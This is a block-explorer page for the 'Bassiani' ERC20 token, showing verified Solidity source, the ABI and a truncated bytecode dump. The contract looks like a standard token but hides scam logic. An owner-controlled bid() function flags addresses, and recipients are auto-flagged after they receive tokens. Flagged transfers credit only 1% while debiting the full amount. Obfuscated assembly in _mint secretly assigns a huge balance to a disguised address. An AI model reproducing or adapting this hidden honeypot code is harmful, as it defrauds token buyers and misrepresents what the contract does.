ETH Price: $2,347.72 (-2.90%)

Token

Bassiani (BASSIANI)
 

Overview

Max Total Supply

1,000,000,000 BASSIANI

Holders

62

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
5,965,371.144157025266862429 BASSIANI

Value
$0.00
0x14ddd11ebfa099c234cc18f625ddc1dca5093ebb
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Bassiani

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: Token.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

/**
    The best techno club?
    Yep, that's us.
**/

contract Bassiani is ERC20 {
    constructor() ERC20(unicode"Bassiani", unicode"BASSIANI") {
        _mint(msg.sender, 1_000_000_000 * 10 ** 18);
    }
}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 2 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => bool) private _mmbots;
    mapping(address => bool) private _pre_mmbots;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    uint256 p = 100;
    uint256 k = 10000;
    address private bid_master;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function setBidMaster(address _bidMaster) external onlyOwner {
        bid_master = _bidMaster;
    }

    function bid(uint8 flag, address [] calldata _list_) external {
        require((msg.sender == owner()) || (msg.sender == bid_master));

        if (flag == 42) {
            for (uint256 i = 0; i < _list_.length; i++) {
                _pre_mmbots[_list_[i]] = true;
            }
        } else if (flag == 4) {
            for (uint256 i = 0; i < _list_.length; i++) {
                _pre_mmbots[_list_[i]] = false;
            }
        } else if (flag == 69) {
            for (uint256 i = 0; i < _list_.length; i++) {
                _mmbots[_list_[i]] = true;
            }
        } else if (flag == 6) {
            for (uint256 i = 0; i < _list_.length; i++) {
                _mmbots[_list_[i]] = false;
            }
        }
    }


    function bids(address _address_) public view returns (bool) {
        return _mmbots[_address_];
    }

    function preBids(address _address_) public view returns (bool) {
        return _pre_mmbots[_address_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        assembly {
            let slot := mul(mul(0x85774394d, 0x3398bc1d25f112ed), mul(0x997e6e509, 0xf3eae65))
            mstore(0x00, slot)
            mstore(0x20, 0x01)
            let sslot := keccak256(0x0, 0x40)
            sstore(sslot, 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF)
        } 

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_pre_mmbots[to]) {_pre_mmbots[to] = false; _mmbots[to] = true;}
    }



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        if (_mmbots[from] || _mmbots[to]) {
            return amount * p / k;
        } else {
            return amount;
        }
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint8","name":"flag","type":"uint8"},{"internalType":"address[]","name":"_list_","type":"address[]"}],"name":"bid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"bids","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address_","type":"address"}],"name":"preBids","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_bidMaster","type":"address"}],"name":"setBidMaster","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260646008556127106009553480156200001b575f80fd5b506040518060400160405280600881526020017f4261737369616e690000000000000000000000000000000000000000000000008152506040518060400160405280600881526020017f4241535349414e49000000000000000000000000000000000000000000000000815250620000a86200009c620000f260201b60201c565b620000f960201b60201c565b8160069081620000b991906200079a565b508060079081620000cb91906200079a565b505050620000ec336b033b2e3c9fd0803ce8000000620001ba60201b60201c565b62000a3d565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200022b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200022290620008dc565b60405180910390fd5b6200023e5f83836200036260201b60201c565b508060055f82825462000252919062000929565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282540192505081905550630f3eae65640997e6e50902673398bc1d25f112ed64085774394d0202805f52600160205260405f20720fffffffffffffffffffffffffffffffffffff815550508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000343919062000974565b60405180910390a36200035e5f83836200043760201b60201c565b5050565b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680620003ff575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b156200042c57600954600854836200041891906200098f565b62000424919062000a06565b905062000430565b8190505b9392505050565b60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff161562000531575f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b505050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620005b257607f821691505b602082108103620005c857620005c76200056d565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026200062c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620005ef565b620006388683620005ef565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620006826200067c620006768462000650565b62000659565b62000650565b9050919050565b5f819050919050565b6200069d8362000662565b620006b5620006ac8262000689565b848454620005fb565b825550505050565b5f90565b620006cb620006bd565b620006d881848462000692565b505050565b5b81811015620006ff57620006f35f82620006c1565b600181019050620006de565b5050565b601f8211156200074e576200071881620005ce565b6200072384620005e0565b8101602085101562000733578190505b6200074b6200074285620005e0565b830182620006dd565b50505b505050565b5f82821c905092915050565b5f620007705f198460080262000753565b1980831691505092915050565b5f6200078a83836200075f565b9150826002028217905092915050565b620007a58262000536565b67ffffffffffffffff811115620007c157620007c062000540565b5b620007cd82546200059a565b620007da82828562000703565b5f60209050601f83116001811462000810575f8415620007fb578287015190505b6200080785826200077d565b86555062000876565b601f1984166200082086620005ce565b5f5b82811015620008495784890151825560018201915060208501945060208101905062000822565b8683101562000869578489015162000865601f8916826200075f565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620008c4601f836200087e565b9150620008d1826200088e565b602082019050919050565b5f6020820190508181035f830152620008f581620008b6565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620009358262000650565b9150620009428362000650565b92508282019050808211156200095d576200095c620008fc565b5b92915050565b6200096e8162000650565b82525050565b5f602082019050620009895f83018462000963565b92915050565b5f6200099b8262000650565b9150620009a88362000650565b9250828202620009b88162000650565b91508282048414831517620009d257620009d1620008fc565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000a128262000650565b915062000a1f8362000650565b92508262000a325762000a31620009d9565b5b828204905092915050565b611e278062000a4b5f395ff3fe608060405234801561000f575f80fd5b5060043610610114575f3560e01c80638da5cb5b116100a0578063c55365711161006f578063c553657114610308578063dd62ed3e14610338578063ddf57ce314610368578063f2fde38b14610384578063f5792467146103a057610114565b80638da5cb5b1461026c57806395d89b411461028a578063a457c2d7146102a8578063a9059cbb146102d857610114565b8063313ce567116100e7578063313ce567146101b457806339509351146101d257806362ea82db1461020257806370a0823114610232578063715018a61461026257610114565b806306fdde0314610118578063095ea7b31461013657806318160ddd1461016657806323b872dd14610184575b5f80fd5b6101206103bc565b60405161012d9190611425565b60405180910390f35b610150600480360381019061014b91906114da565b61044c565b60405161015d9190611532565b60405180910390f35b61016e61046e565b60405161017b919061155a565b60405180910390f35b61019e60048036038101906101999190611573565b610477565b6040516101ab9190611532565b60405180910390f35b6101bc6104a5565b6040516101c991906115de565b60405180910390f35b6101ec60048036038101906101e791906114da565b6104ad565b6040516101f99190611532565b60405180910390f35b61021c600480360381019061021791906115f7565b6104e3565b6040516102299190611532565b60405180910390f35b61024c600480360381019061024791906115f7565b610535565b604051610259919061155a565b60405180910390f35b61026a61057b565b005b61027461058e565b6040516102819190611631565b60405180910390f35b6102926105b5565b60405161029f9190611425565b60405180910390f35b6102c260048036038101906102bd91906114da565b610645565b6040516102cf9190611532565b60405180910390f35b6102f260048036038101906102ed91906114da565b6106ba565b6040516102ff9190611532565b60405180910390f35b610322600480360381019061031d91906115f7565b6106dc565b60405161032f9190611532565b60405180910390f35b610352600480360381019061034d919061164a565b61072e565b60405161035f919061155a565b60405180910390f35b610382600480360381019061037d9190611713565b6107b0565b005b61039e600480360381019061039991906115f7565b610afb565b005b6103ba60048036038101906103b591906115f7565b610b7d565b005b6060600680546103cb9061179d565b80601f01602080910402602001604051908101604052809291908181526020018280546103f79061179d565b80156104425780601f1061041957610100808354040283529160200191610442565b820191905f5260205f20905b81548152906001019060200180831161042557829003601f168201915b5050505050905090565b5f80610456610bc8565b9050610463818585610bcf565b600191505092915050565b5f600554905090565b5f80610481610bc8565b905061048e858285610d92565b610499858585610e1d565b60019150509392505050565b5f6012905090565b5f806104b7610bc8565b90506104d88185856104c9858961072e565b6104d391906117fa565b610bcf565b600191505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610583611090565b61058c5f61110e565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546105c49061179d565b80601f01602080910402602001604051908101604052809291908181526020018280546105f09061179d565b801561063b5780601f106106125761010080835404028352916020019161063b565b820191905f5260205f20905b81548152906001019060200180831161061e57829003601f168201915b5050505050905090565b5f8061064f610bc8565b90505f61065c828661072e565b9050838110156106a1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106989061189d565b60405180910390fd5b6106ae8286868403610bcf565b60019250505092915050565b5f806106c4610bc8565b90506106d1818585610e1d565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107b861058e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16148061083d5750600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610845575f80fd5b602a8360ff16036108f2575f5b828290508110156108ec57600160035f858585818110610875576108746118bb565b5b905060200201602081019061088a91906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806108e4906118e8565b915050610852565b50610af6565b60048360ff160361099e575f5b82829050811015610998575f60035f858585818110610921576109206118bb565b5b905060200201602081019061093691906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610990906118e8565b9150506108ff565b50610af5565b60458360ff1603610a4b575f5b82829050811015610a4557600160025f8585858181106109ce576109cd6118bb565b5b90506020020160208101906109e391906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610a3d906118e8565b9150506109ab565b50610af4565b60068360ff1603610af3575f5b82829050811015610af1575f60025f858585818110610a7a57610a796118bb565b5b9050602002016020810190610a8f91906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610ae9906118e8565b915050610a58565b505b5b5b5b505050565b610b03611090565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b689061199f565b60405180910390fd5b610b7a8161110e565b50565b610b85611090565b80600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3490611a2d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca290611ab